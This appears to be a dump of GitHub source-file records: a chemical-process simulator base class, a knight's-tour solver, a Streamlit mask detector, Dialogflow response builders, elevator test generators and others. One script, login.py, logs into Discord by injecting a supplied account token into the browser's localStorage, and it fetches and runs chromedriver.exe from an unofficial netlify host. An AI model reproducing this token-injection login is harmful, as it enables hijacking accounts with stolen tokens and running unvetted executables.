blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7d4aaa5e2ea4a2279deba143f873f693f7394bc4 | c5148bc364dac753c0872bd5676027a30b260486 | /biosteam/_facility.py | be6ea781f47ebbbb09b743864d6630a54816bf2b | [
"MIT",
"NCSA",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Ecoent/biosteam | 86f47c713a2cae5d6261b6c2c7734ccf7a90fb4e | f1371386d089df3aa8ce041175f210c0318c1fe0 | refs/heads/master | 2021-02-24T14:10:23.158984 | 2020-03-05T03:43:17 | 2020-03-05T03:43:17 | 245,433,768 | 1 | 0 | NOASSERTION | 2020-03-06T13:59:27 | 2020-03-06T13:59:26 | null | UTF-8 | Python | false | false | 270 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Jul 13 02:24:35 2019
@author: yoelr
"""
from ._unit import Unit
__all__ = ('Facility',)
class Facility(Unit, isabstract=True, new_graphics=False):
    """Abstract base class for facility units.

    NOTE(review): ``_system`` is only read here; it is presumably assigned
    elsewhere (e.g. by the owning System when the facility is registered)
    -- confirm against the System implementation.
    """
    @property
    def system(self):
        # Read-only view of the System this facility belongs to.
        return self._system
| [
"yoelcortes@gmail.com"
] | yoelcortes@gmail.com |
d51ab0ae91247b60142121da28a88d765a3c73e0 | e8ed7f1bef51d356d18db21869741bd805154d89 | /src/puzzles/InterviewKickstart/graphs/knights-tour.py | 29b055a36b7e23c54030dfb99305d537f5903486 | [] | no_license | brentshermana/CompetativeProgramming | 425e00407b7143693840d393587a7a584baf2197 | bc9ff952beb9491763001ee04e9eb74b6bdb2771 | refs/heads/master | 2021-06-07T00:53:07.874800 | 2020-05-13T03:11:02 | 2020-05-13T03:11:02 | 91,009,161 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,378 | py | # given a rows * cols chessboard, and a start and end coordinate,
# calculate the minimum number of moves needed to reach the end coordinate
# using a knight in chess
# return -1 if the path can't be found
from collections import deque, defaultdict
from itertools import product
def find_minimum_number_of_moves(rows, cols, start_row, start_col, end_row, end_col):
    """Return the minimum number of knight moves from start to end on a
    rows x cols board, or -1 if the end square is unreachable.

    Uses breadth-first search, so the first time the target is dequeued
    the move count is minimal.
    """
    # The eight L-shaped knight offsets, listed explicitly instead of the
    # original two itertools.product loops.
    knight_moves = ((1, 2), (1, -2), (-1, 2), (-1, -2),
                    (2, 1), (2, -1), (-2, 1), (-2, -1))

    def neighbours(r, c):
        """Yield in-bounds squares one knight move away from (r, c)."""
        for dr, dc in knight_moves:
            nr, nc = r + dr, c + dc
            if 0 <= nr < rows and 0 <= nc < cols:
                yield nr, nc

    # A set of (row, col) tuples replaces the nested defaultdicts; it is
    # simpler and makes membership intent explicit.
    visited = {(start_row, start_col)}
    queue = deque([(start_row, start_col, 0)])
    while queue:
        r, c, moves = queue.popleft()
        if (r, c) == (end_row, end_col):
            return moves
        for nr, nc in neighbours(r, c):
            if (nr, nc) not in visited:
                visited.add((nr, nc))
                queue.append((nr, nc, moves + 1))
    # BFS exhausted without reaching the target: no path exists.
    return -1
"brentshermana@gmail.com"
] | brentshermana@gmail.com |
13009aa46d9516b16f06a105e83f9ac1c56be707 | d9ea7a6f739912047ab5817bdbdd082ef64ad433 | /streamlit_app.py | e80637f81387f5d3d36306430cf6bc1a7d194d43 | [] | no_license | weijiewong27/Hack-Cambridge-MaskerAID | cca6e86455ba65e6692980af9d723064f61cebf0 | 1b943c3023821d1bbf3a4e9b6138d730ed11420a | refs/heads/main | 2023-02-20T15:09:55.045312 | 2021-01-24T12:46:02 | 2021-01-24T12:46:02 | 332,177,118 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,707 | py | # Import all required libaries
# Standard library
import os
import urllib
import urllib.request  # fix: `import urllib` alone does not import the request submodule used below

# Third-party
import cv2
import matplotlib.image as mpimg
import numpy as np
import streamlit as st
from PIL import Image
from tensorflow.keras.applications.mobilenet_v2 import preprocess_input
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.models import load_model
# Operating system dependencies
# NOTE(review): this env toggle allows duplicate OpenMP runtime loads
# (commonly needed when TF and other native libs both bundle OpenMP) --
# confirm it is still required in the deployment environment.
os.environ['KMP_DUPLICATE_LIB_OK']='True'
# Silence the deprecated file-uploader encoding warning in Streamlit.
st.set_option('deprecation.showfileUploaderEncoding', False)
# Streamlit encourages well-structured code, like starting execution in a main() function.
def main():
    """Render the sidebar mode selector and dispatch to the chosen view."""
    # The instructions markdown is shown by default and cleared for every
    # mode other than "Show instructions".
    readme_text = st.markdown(get_file_content_as_string("instructions.md"))

    st.sidebar.title("What to do")
    modes = ["Show instructions", "Run the video detector",
             "Run the image detector", "Show the source code"]
    app_mode = st.sidebar.selectbox("Choose the app mode", modes)

    if app_mode == "Show instructions":
        st.sidebar.success('To continue select "Run the app".')
        return

    readme_text.empty()
    if app_mode == "Show the source code":
        st.code(get_file_content_as_string("streamlit_app.py"))
    elif app_mode == "Run the video detector":
        run_video_detector()
    elif app_mode == "Run the image detector":
        run_image_detector()
# HELPER FUNCTIONS
def load_face_detector_model():
    """Build the OpenCV DNN face detector from the bundled Caffe files.

    Expects a ``face_detector`` directory next to the app containing the
    prototxt network definition and the pretrained SSD weights.
    """
    proto_path = os.path.sep.join(["face_detector", "deploy.prototxt"])
    weights_path = os.path.sep.join(
        ['face_detector', 'res10_300x300_ssd_iter_140000.caffemodel'])
    return cv2.dnn.readNet(proto_path, weights_path)
# This will make the app stay performant
@st.cache(allow_output_mutation=True)
def load_mask_model():
    """
    Loads face mask detector model
    """
    # Keras model file expected in the app's working directory; cached by
    # Streamlit so the model is only deserialized once per session.
    mask_model = load_model("mask_detector_ewan.model")
    return mask_model
# Load both models once at import time; used by the detect_* helpers below.
net = load_face_detector_model() # OpenCV DNN face detector
model = load_mask_model() # Keras mask classifier
# Create confidence level slider (minimum face-detection score to keep).
# NOTE(review): st.sidebar.slider(label, min, max, value, step) is called
# with min=0.0, max=0.1, default=0.5 -- the default exceeds the maximum;
# max was presumably meant to be 1.0. TODO confirm and fix.
confidence_selected = st.sidebar.slider(
    'Select a confidence range', 0.0, 0.1, 0.5, 0.1) # display button to adjust 'confidence' between 0 - 0.5
# Helper functions to load the image and loop over the detection (for video and image options)
def detect_mask_video(image):
    """Detect faces in one BGR video frame and classify each as mask/no-mask.

    Returns the annotated frame plus the label, box coordinates and color
    of the last face drawn (or the defaults below when none was found).
    """
    # Defaults returned when no detection clears the confidence threshold.
    label='Starting...'
    startX, startY, endX, endY = 0,0,0,0
    # NOTE(review): `color` starts as the string 'g' but is reassigned to a
    # BGR tuple once a face is found -- callers should not rely on its type
    # before the first detection. TODO confirm intent.
    color = 'g'
    # Pre-process image to fit input tensor of face detection model
    image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) # convert frame from BGR to RGB
    orig = image.copy() # unannotated copy (currently unused)
    (h, w) = image.shape[:2] # frame height and width, used to scale box coords
    blob = cv2.dnn.blobFromImage(image, 1.0, (300, 300), # 300x300 input blob;
        (104.0, 177.0, 123.0)) # tuple = per-channel mean-subtraction values
    # Feed the blob to the face detector and run a forward pass.
    net.setInput(blob)
    detection = net.forward() # one row per candidate face detection
    for i in range(0, detection.shape[2]): # loop over candidate detections
        confidence = detection[0, 0, i, 2] # detection score for candidate i
        if confidence > confidence_selected: # keep only confident detections
            # Scale the normalized box back to pixel coords and clamp to frame
            box = detection[0, 0, i, 3:7] * np.array([w, h, w, h])
            (startX, startY, endX, endY) = box.astype("int")
            (startX, startY) = (max(0, startX), max(0, startY))
            (endX, endY) = (min(w-1, endX), min(h-1, endY)) # keep box inside the frame
            # Extract face ROI and preprocess for the mask classifier
            face = image[startY:endY, startX:endX]
            # NOTE(review): `image` was already converted to RGB above, so
            # this second BGR2RGB swaps the channels back -- confirm which
            # channel order the mask model was trained on.
            face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB)
            face = cv2.resize(face, (128, 128)) # mask model input size (128x128 - Ewan; 224x224 - Crib)
            face = img_to_array(face) # HWC float array
            face = preprocess_input(face) # MobileNetV2-style scaling
            face = np.expand_dims(face, axis=0) # add batch dimension
            # Classify the face and build the display label
            (mask, withoutMask) = model.predict(face)[0]
            label = "Mask on" if mask > withoutMask else "No Mask"
            color = (0, 255, 0) if label == "Mask on" else (255, 0, 0) # green if masked, red otherwise (RGB)
            label = "{}: {:.2f}%".format(label, max(mask, withoutMask) * 100) # append probability
            # Draw label and bounding box on the output frame
            cv2.putText(image, label, (startX, startY - 10),
                cv2.FONT_HERSHEY_SIMPLEX, 1.20, color, 2)
            cv2.rectangle(image, (startX, startY), (endX, endY), color, 2)
        else:
            continue
    return image, label, startX, startY, endX, endY, color # annotated frame + last detection info
def detect_mask_image(image):
    """Detect faces in an uploaded image and classify each as mask/no-mask.

    *image* is the uploaded file object from ``st.file_uploader``.
    Returns the annotated RGB image array and the label of the last face
    processed (or the default below when no face clears the threshold).
    """
    # Fix: `label` was only assigned inside the detection branch, so an
    # image with no confident face raised UnboundLocalError at the return.
    label = "No face detected"
    # Decode the uploaded bytes into a BGR OpenCV image.
    # NOTE(review): np.fromstring is deprecated in favor of np.frombuffer --
    # confirm the installed numpy version before switching.
    image = cv2.imdecode(np.fromstring(image.read(), np.uint8), 1)
    image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) # convert image from BGR to RGB
    orig = image.copy() # unannotated copy (currently unused)
    (h, w) = image.shape[:2] # image height and width, used to scale box coords
    blob = cv2.dnn.blobFromImage(image, 1.0, (300, 300), # 300x300 input blob;
        (104.0, 177.0, 123.0)) # tuple = per-channel mean-subtraction values
    # Feed the blob to the face detector and run a forward pass.
    net.setInput(blob)
    detection = net.forward() # one row per candidate face detection
    for i in range(0, detection.shape[2]): # loop over candidate detections
        confidence = detection[0, 0, i, 2] # detection score for candidate i
        if confidence > confidence_selected: # keep only confident detections
            # Scale the normalized box back to pixel coords and clamp to frame
            box = detection[0, 0, i, 3:7] * np.array([w, h, w, h])
            (startX, startY, endX, endY) = box.astype("int")
            (startX, startY) = (max(0, startX), max(0, startY))
            (endX, endY) = (min(w-1, endX), min(h-1, endY)) # keep box inside the image
            # Extract face ROI and preprocess for the mask classifier
            face = image[startY:endY, startX:endX]
            # NOTE(review): `image` is already RGB here, so this conversion
            # swaps channels back to BGR -- confirm the channel order the
            # mask model was trained on before removing it.
            face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB)
            face = cv2.resize(face, (128, 128)) # mask model input size
            face = img_to_array(face) # HWC float array
            face = preprocess_input(face) # MobileNetV2-style scaling
            face = np.expand_dims(face, axis=0) # add batch dimension
            # Classify the face and build the display label
            (mask, withoutMask) = model.predict(face)[0]
            label = "Mask" if mask > withoutMask else "No Mask"
            color = (0, 255, 0) if label == "Mask" else (255, 0, 0) # green if masked, red otherwise (RGB)
            label = "{}: {:.2f}%".format(label, max(mask, withoutMask) * 100) # append probability
            # Draw label and bounding box on the output image
            cv2.putText(image, label, (startX, startY - 10),
                cv2.FONT_HERSHEY_SIMPLEX, 0.45, color, 2)
            cv2.rectangle(image, (startX, startY), (endX, endY), color, 2)
    return image, label # annotated image and last label drawn
def run_video_detector():
    """Stream webcam frames through the mask detector while 'Run' is checked."""
    st.title("Face Mask Detector Video App :mask:") # create App title
    run = st.checkbox('Run') # unchecking stops the capture loop
    FRAME_WINDOW = st.image([])
    camera = cv2.VideoCapture(0) # default webcam
    try:
        while run:
            _, frame = camera.read()
            # Annotate the frame; only the image part of the result is shown.
            image, label, startX, startY, endX, endY, color = detect_mask_video(frame)
            FRAME_WINDOW.image(image)
        else:
            st.write('Stopped')
    finally:
        # Fix: release the capture device so the webcam is freed when the
        # loop ends or an error occurs (the original leaked the handle).
        camera.release()
def run_image_detector():
    """Upload an image, run mask detection on demand, and show the result."""
    st.title("Face Mask Detector Image App :mask:")
    uploaded_file = st.file_uploader("Upload image", type=['jpeg', 'jpg', 'png'])
    if uploaded_file is None:
        # Nothing uploaded yet (or a zero-byte file): render nothing else.
        return
    # Preview the upload in the sidebar, then process on button click.
    st.sidebar.image(uploaded_file, width=240)
    if st.button("Process"):
        annotated, verdict = detect_mask_image(uploaded_file)
        st.image(annotated, width=420)
        st.success('### ' + verdict)
# Download a single file and make its content available as a string.
@st.cache(show_spinner=False)
def get_file_content_as_string(path):
    """Fetch *path* from the configured GitHub raw URL and return UTF-8 text."""
    # NOTE(review): this base URL points at the streamlit demo-self-driving
    # repository, not this project's repo -- confirm/replace.
    url = 'https://raw.githubusercontent.com/streamlit/demo-self-driving/master/' + path
    # Fix: close the HTTP connection deterministically instead of leaking it.
    with urllib.request.urlopen(url) as response:
        return response.read().decode("utf-8")
if __name__ == "__main__":
    # Entry point when the script is executed (e.g. `streamlit run app.py`).
    main()
"wjw27@cam.ac.uk"
] | wjw27@cam.ac.uk |
6d031f1f4dcbd9c766182a6e3f257ba19b599a3e | 562d4bf000dbb66cd7109844c972bfc00ea7224c | /addons-clarico/clarico_product/model/__init__.py | ab1cc71c7f627b65c753c486e16b42d63d131315 | [] | no_license | Mohamed33/odoo-efact-11-pos | e9da1d17b38ddfe5b2d0901b3dbadf7a76bd2059 | de38355aea74cdc643a347f7d52e1d287c208ff8 | refs/heads/master | 2023-03-10T15:24:44.052883 | 2021-03-06T13:25:58 | 2021-03-06T13:25:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 79 | py | from . import product_template
from . import website
from . import res_config
| [
"root@vmi414107.contaboserver.net"
] | root@vmi414107.contaboserver.net |
1dbac791c31e900db51a5eea154891b5d83a0906 | 35d57f0c682f28ccf8cf8c08efba8dba07e1dc0b | /df_responses.py | 9e99feb3cd35d75d0b7e4a95b72d4ac670c16bfa | [] | no_license | SaiSudhaPanigrahi/halo-nyutia | 88babc51f70ad51468502f8eab863527d218bec3 | a04a8d844cd325218e9657896a88d79648c67f19 | refs/heads/master | 2022-04-17T16:03:35.102612 | 2020-04-15T12:55:18 | 2020-04-15T12:55:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,743 | py | # Responses for Actions On Google
class actions_on_google_response():
    """Builders for Dialogflow rich-response payloads targeting
    Actions on Google.

    Every builder returns a plain dict tagged with
    ``"platform": "ACTIONS_ON_GOOGLE"`` suitable for inclusion in a
    webhook fulfillment message.
    """

    def __init__(self):
        # Platform tag attached to every payload built by this class.
        self.platform = "ACTIONS_ON_GOOGLE"

    def simple_response(self, responses):
        """Build a simple response.

        *responses* is a list of at most two ``[display_text, speech,
        is_ssml]`` triples; when ``is_ssml`` is truthy the speech string
        is emitted as SSML, otherwise as plain textToSpeech.

        Raises Exception when more than two responses are supplied.
        """
        if len(responses) > 2:
            raise Exception(
                "Responses argument in simple response should have at most two elements only.")
        responses_json = []
        for response in responses:
            entry = {"displayText": str(response[0])}
            # response[2] selects SSML vs. plain text-to-speech output.
            if response[2]:
                entry["ssml"] = str(response[1])
            else:
                entry["textToSpeech"] = str(response[1])
            responses_json.append(entry)
        return {
            "platform": self.platform,
            "simpleResponses": {
                "simpleResponses": responses_json
            }
        }

    def basic_card(self, title, subtitle="", formattedText="", image=None, buttons=None):
        """Build a basic card.

        *image* is ``[image_url, accessibility_text]``; *buttons* is a list
        of ``[button_title, url]`` pairs. Either may be omitted.
        """
        card = {
            "title": title,
            "subtitle": subtitle,
            "formattedText": formattedText,
        }
        if buttons is not None:
            # Each button opens its URL when tapped.
            card["buttons"] = [
                {"title": button[0], "openUriAction": {"uri": button[1]}}
                for button in buttons
            ]
        # Fix: the original dereferenced image[0] unconditionally and raised
        # TypeError whenever image was left as its declared default (None);
        # the image section is now included only when an image is supplied.
        if image is not None:
            card["image"] = {
                "imageUri": image[0],
                "accessibilityText": image[1]
            }
        return {
            "platform": self.platform,
            "basicCard": card
        }

    def list_select(self, list_title, list_elements):
        """Build a list response with 2..30 items.

        Each element is ``[title, description, [key, synonyms],
        [image_url, accessibility_text]]``.

        Raises Exception when the element count is outside 2..30
        (the Actions on Google limit).
        """
        if len(list_elements) > 30 or len(list_elements) < 2:
            raise Exception("List items must be two or less than 30.")
        items_list = []
        for element in list_elements:
            items_list.append({
                "title": element[0],
                "description": element[1],
                "info": {
                    # The key doubles as the user-say string; synonyms let
                    # typed input match the option as well.
                    "key": element[2][0],
                    "synonyms": element[2][1]
                },
                "image": {
                    "imageUri": element[3][0],
                    "accessibilityText": element[3][1]
                }
            })
        return {
            "platform": self.platform,
            "listSelect": {
                "title": list_title,
                "items": items_list
            }
        }

    def suggestion_chips(self, suggestions):
        """Build suggestion chips from a non-empty list of chip titles."""
        if len(suggestions) <= 0:
            raise Exception(
                "Please provide at least one suggestion in suggestion chips response.")
        return {
            "platform": self.platform,
            "suggestions": {
                "suggestions": [{"title": str(s)} for s in suggestions]
            }
        }

    def link_out_suggestion(self, title, url):
        """Build a link-out suggestion with a destination name and URL."""
        if title == "" or url == "":
            raise Exception(
                "Provide the title and URL for link out suggestion response.")
        return {
            "platform": self.platform,
            "linkOutSuggestion": {
                "destinationName": str(title),
                "uri": str(url)
            }
        }
# Responses for Facebook
class facebook_response():
    """Builders for Dialogflow rich-response payloads targeting Facebook."""

    def __init__(self):
        # Platform tag attached to every payload built by this class.
        self.platform = "FACEBOOK"

    def text_response(self, texts):
        """Build a text response from a list of text variants."""
        if not texts:
            raise Exception("Provide the text for the text response")
        return {
            "text": {"text": [str(t) for t in texts]},
            "platform": self.platform,
        }

    def quick_replies(self, title, quick_replies_list):
        """Build a quick-replies response with a title and reply strings."""
        if title == "":
            raise Exception("Title is required for basic card in facebook.")
        if not quick_replies_list:
            raise Exception(
                "Quick replies response must contain at least on text string.")
        return {
            "quickReplies": {
                "title": str(title),
                "quickReplies": [str(q) for q in quick_replies_list],
            },
            "platform": self.platform,
        }

    def image_response(self, url):
        """Build an image response for the given image URL."""
        if url == "":
            raise Exception("URL in the image response is required.")
        return {
            "image": {"imageUri": str(url)},
            "platform": self.platform,
        }

    def card_response(self, title, buttons):
        """Build a card; *buttons* is a list of [text, postback] pairs."""
        return {
            "card": {
                "title": str(title),
                "buttons": [
                    {"text": str(b[0]), "postback": str(b[1])} for b in buttons
                ],
            },
            "platform": self.platform,
        }
# Responses for Telegram
class telegram_response():
    """Builders for Dialogflow rich-response payloads targeting Telegram."""

    def __init__(self):
        # Platform tag attached to every payload built by this class.
        self.platform = "TELEGRAM"

    def text_response(self, texts):
        """Build a text response from a list of text variants."""
        if len(texts) <= 0:
            raise Exception("Provide the text for the text response")
        return {
            "text": {"text": [str(t) for t in texts]},
            "platform": self.platform,
        }

    def quick_replies(self, title, quick_replies_list):
        """Build a quick-replies response with a title and reply strings."""
        if title == "":
            # Fix: the original error message said "facebook" -- a copy-paste
            # leftover from the facebook_response class.
            raise Exception("Title is required for basic card in telegram.")
        if len(quick_replies_list) <= 0:
            raise Exception(
                "Quick replies response must contain at least on text string.")
        return {
            "quickReplies": {
                "title": str(title),
                "quickReplies": [str(q) for q in quick_replies_list],
            },
            "platform": self.platform,
        }

    def image_response(self, url):
        """Build an image response for the given image URL."""
        if url == "":
            raise Exception("URL in the image response is required.")
        return {
            "image": {"imageUri": str(url)},
            "platform": self.platform,
        }

    def card_response(self, title, buttons):
        """Build a card; *buttons* is a list of [text, postback] pairs."""
        return {
            "card": {
                "title": str(title),
                "buttons": [
                    {"text": str(b[0]), "postback": str(b[1])} for b in buttons
                ],
            },
            "platform": self.platform,
        }
# dialogflow fulfillment response
class fulfillment_response():
    """Assembles the top-level Dialogflow webhook fulfillment JSON.

    The four builder methods each return a small dict keyed in snake_case;
    main_response() merges them into the final camelCase webhook payload.
    """

    def __init__(self):
        pass

    def fulfillment_text(self, fulfillmentText):
        """Wrap plain fulfillment text. Raises when the text is empty."""
        if fulfillmentText == "":
            raise Exception("Fulfillment text should not be empty.")
        return {
            "fulfillment_text": str(fulfillmentText)
        }

    def fulfillment_messages(self, response_objects):
        """Wrap response objects as fulfillment messages.

        Fix: the result is now keyed 'fulfillment_messages' (snake_case,
        matching the other three builders) so that main_response() can read
        it -- the original returned 'fulfillmentMessages', which made
        main_response raise KeyError whenever messages were supplied.
        """
        if len(response_objects) <= 0:
            raise Exception(
                "Response objects must contain at least one response object.")
        messages = [{"text": {"text": [obj]}} for obj in response_objects]
        return {
            "fulfillment_messages": messages
        }

    def output_contexts(self, session, contexts):
        """Build output contexts.

        *session* is the Dialogflow session path; each context is a
        ``[name, lifespan_count, parameters]`` triple.
        """
        contexts_json = []
        for context in contexts:
            contexts_json.append({
                # Context names are scoped under the session path.
                "name": session + "/contexts/" + context[0],
                "lifespanCount": context[1],
                "parameters": context[2]
            })
        return {
            "output_contexts": contexts_json
        }

    def followup_event_input(self, name, parameters):
        """Build a followup event with a name and a dict of parameters."""
        return {
            "followup_event_input": {
                "name": str(name),
                "parameters": parameters
            }
        }

    def main_response(self, fulfillment_text, fulfillment_messages=None, output_contexts=None, followup_event_input=None):
        """Merge the builder outputs into the final webhook response.

        Replaces the original nested if/else pyramid with incremental dict
        construction; optional sections are included only when supplied.
        """
        response = {
            "fulfillmentText": fulfillment_text['fulfillment_text']
        }
        if fulfillment_messages is not None:
            response["fulfillmentMessages"] = fulfillment_messages['fulfillment_messages']
        if output_contexts is not None:
            response["outputContexts"] = output_contexts['output_contexts']
        if followup_event_input is not None:
            response["followupEventInput"] = followup_event_input['followup_event_input']
        return response
| [
"romanticdevil.jimmy@gmail.com"
] | romanticdevil.jimmy@gmail.com |
ef4ace6d77e93557af3874532ced9981d737fdd6 | a5a4cee972e487512275c34f308251e6cc38c2fa | /examples/Ni__eam__born_exp_fs__postprocessing/CCA_param_clusters_in_qoi_space/configuration/configure_qoi_pca_transform.py | 7c3b9ff7b710945bd9e4fc499cce2f5621fb418b | [
"MIT"
] | permissive | eragasa/pypospack | 4f54983b33dcd2dce5b602bc243ea8ef22fee86b | 21cdecaf3b05c87acc532d992be2c04d85bfbc22 | refs/heads/master | 2021-06-16T09:24:11.633693 | 2019-12-06T16:54:02 | 2019-12-06T16:54:02 | 99,282,824 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,110 | py | from collections import OrderedDict
from pypospack.pyposmat.data.pipeline import PyposmatPipeline
# Pipeline configuration: ordered mapping of step number -> segment spec,
# serialized to a .in file by the __main__ guard below.
pipeline_configuration = OrderedDict()

# define first segment (standard-scaler normalization of the qoi columns)
pipeline_configuration[0] = OrderedDict() # int keys indicate step number
pipeline_configuration[0]['segment_type'] = 'preprocess'
pipeline_configuration[0]['function_calls'] = OrderedDict()
pipeline_configuration[0]['function_calls'][0]= OrderedDict() # int keys allow multiple calls to same function
pipeline_configuration[0]['function_calls'][0]['function'] = 'normalize_standard_scaler'
pipeline_configuration[0]['function_calls'][0]['args'] = OrderedDict()
pipeline_configuration[0]['function_calls'][0]['args']['cols'] = ['qoi']
pipeline_configuration[0]['function_calls'][0]['args']['clusters'] = None
pipeline_configuration[0]['function_calls'][0]['args']['kwargs'] = OrderedDict()
pipeline_configuration[0]['function_calls'][0]['args']['kwargs']['standard_scaler'] = OrderedDict()
# Center to zero mean and scale to unit variance.
pipeline_configuration[0]['function_calls'][0]['args']['kwargs']['standard_scaler']['with_mean'] = True
pipeline_configuration[0]['function_calls'][0]['args']['kwargs']['standard_scaler']['with_std'] = True

# define second segment (CCA transformation of the normalized qoi columns)
# NOTE(review): segment_type is 'pca' while the function is 'transform_cca'
# and the file is named ..._pca_transform -- confirm which transform is
# actually intended before relying on this configuration.
pipeline_configuration[1] = OrderedDict()
pipeline_configuration[1]['segment_type'] = 'pca'
pipeline_configuration[1]['function_calls'] = OrderedDict()
pipeline_configuration[1]['function_calls'][0]= OrderedDict()
pipeline_configuration[1]['function_calls'][0]['function'] = 'transform_cca'
pipeline_configuration[1]['function_calls'][0]['args'] = OrderedDict()
pipeline_configuration[1]['function_calls'][0]['args']['cols'] = ['n_qoi']
pipeline_configuration[1]['function_calls'][0]['args']['clusters'] = None
pipeline_configuration[1]['function_calls'][0]['args']['kwargs'] = OrderedDict()
pipeline_configuration[1]['function_calls'][0]['args']['kwargs']['cca'] = OrderedDict()

if __name__ == "__main__":
    # When run directly, serialize this configuration next to the script
    # with a .in extension.
    pipeline = PyposmatPipeline()
    fn = __file__.replace('.py', '.in')
    pipeline.write_configuration(filename=fn,
                                 d=pipeline_configuration)
| [
"seatonullberg@gmail.com"
] | seatonullberg@gmail.com |
3ab1654cf13c314e4c9f4daf380710aefa6fc152 | 95aaeb4653028914d925e47412f8c1f6735ad30c | /test_cases/testcases.py | 2607ffc38b5211550ced1d6ec0809f1e06c82cf3 | [] | no_license | ikelee/ElevatorShaft | c8b600b41f159b3924ae518a2aa2a70c8af5566c | eb13052f065a8205c8ed15995694ae7370591dcc | refs/heads/master | 2020-12-30T15:53:51.094844 | 2017-05-13T04:02:05 | 2017-05-13T04:02:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 884 | py | from random import randrange, sample
from collections import OrderedDict
def test_case(floors, elevators, num_events):
max_time = 1000
events = []
for i in range(num_events):
if randrange(num_events) >= i:
# going up
start, end = sorted(sample(range(floors), 2))
else:
start, end = sorted(sample(range(floors), 2))[::-1]
assert(0 <= start < floors)
assert(0 <= end < floors)
time = randrange(i * max_time / num_events, (i + 1) * max_time / num_events)
time = min(time, max_time)
time = max(time, 0)
events.append(OrderedDict([
("time", time),
("start", start),
("end", end),
]))
output = OrderedDict([
("floors", floors),
("elevators", elevators),
("events", events)
])
return output
| [
"noreply@github.com"
] | ikelee.noreply@github.com |
079cfe8dbc2d32586f57d75411663bad4704564d | b7a516279ecb77a95b9e10383a6c743cf956a54a | /login.py | e55325bf0b272375d5b2f709fe7c512f84f35c57 | [] | no_license | venusyt/Token-Login | adde7685922ea0fb03d7b96aae6e83faba4eb898 | 71e4bf3920d246d79b62bef0b0ed30560d85b9dc | refs/heads/main | 2023-08-16T01:17:29.263688 | 2021-09-22T11:21:20 | 2021-09-22T11:21:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,494 | py | import os
import discord
from discord.ext import commands
import requests, gratient
from selenium import webdriver
import requests, gratient
import os, os.path, requests
import fade
import colorama
# --- Script entry: prompt for a token, fetch chromedriver, inject login ---
os.system("title 𝙑𝙀𝙉𝙐𝙎 𝙏𝙊𝙆𝙀𝙉 𝙇𝙊𝙂𝙄𝙉")
os.system("cls")

# Fix: the original looped forever printing an undefined `banner`
# (NameError) and never asked for a token; prompt until one is entered.
token = ""
while not token:
    os.system("cls")
    token = input("Enter your Discord token: ").strip()

# Download chromedriver on first run. (The original nested the same
# isfile() check twice; a single check is sufficient.)
if not os.path.isfile("C:\\Shyta\\chromedriver.exe"):
    if not os.path.isdir("C:\\Shyta"):
        os.mkdir("C:\\shyta", 0o666)
    print("\n \033[38;2;95;0;230m[>] \033[38;2;190;0;230mDownloading chromedriver...")
    r = requests.get("https://shytadriver.netlify.app/driver/chromedriver.exe")
    # Fix: close the file handle deterministically instead of relying on GC.
    with open("C:\\Shyta\\chromedriver.exe", "wb") as driver_file:
        driver_file.write(r.content)
    print(" \033[38;2;95;0;230m[>] \033[38;2;190;0;230mChromedriver downloaded")

# Keep the browser window open after the script exits.
opts = webdriver.ChromeOptions()
opts.add_experimental_option("detach", True)
driver = webdriver.Chrome("C:\\Shyta\\chromedriver.exe", options=opts)

# Injected into the page: repeatedly writes the token into localStorage via
# a throwaway iframe, then reloads so the site picks up the session.
script = """
function login(token) {
    setInterval(() => {
        document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"`
    }, 50);
    setTimeout(() => {
        location.reload();
    }, 2500);
}
"""
driver.get("https://discordapp.com/login")
driver.execute_script(script + f'\nlogin("{token}")')
| [
"noreply@github.com"
] | venusyt.noreply@github.com |
20f8c0cba24957a6c66e6a49bdc678e57450332e | 5a30ab3416e218f760d11a2fc99289941ac3b426 | /Page/dealPlanCoursePage.py | 6fdb9638d200e621ca25953bb09ee735325bb9ea | [] | no_license | DaYao/pythonAutoYes | fa24ac2f406c72bbf14a05f88b6f8615d4fad586 | e9d9f2e5b210f83589fadc4b2acdb7d6e4e25f04 | refs/heads/master | 2020-05-25T21:28:17.425492 | 2017-07-18T06:12:37 | 2017-07-18T06:12:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,745 | py | __author__ = 'xueyan'
#coding:utf-8
import sys,os
BASE_DIR=os.path.dirname(os.path.dirname(__file__))
sys.path.append(BASE_DIR)
# from selenium import webdriver
from selenium.webdriver.common.by import By
from .homePage import HomePage
from .BasePage import WebUI
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.select import Select
'''消课页面'''
class DealCoursePlanPage(WebUI):
    """Page object for the lesson sign-off ("deal course") dialog."""

    # Locators for the dialog controls.
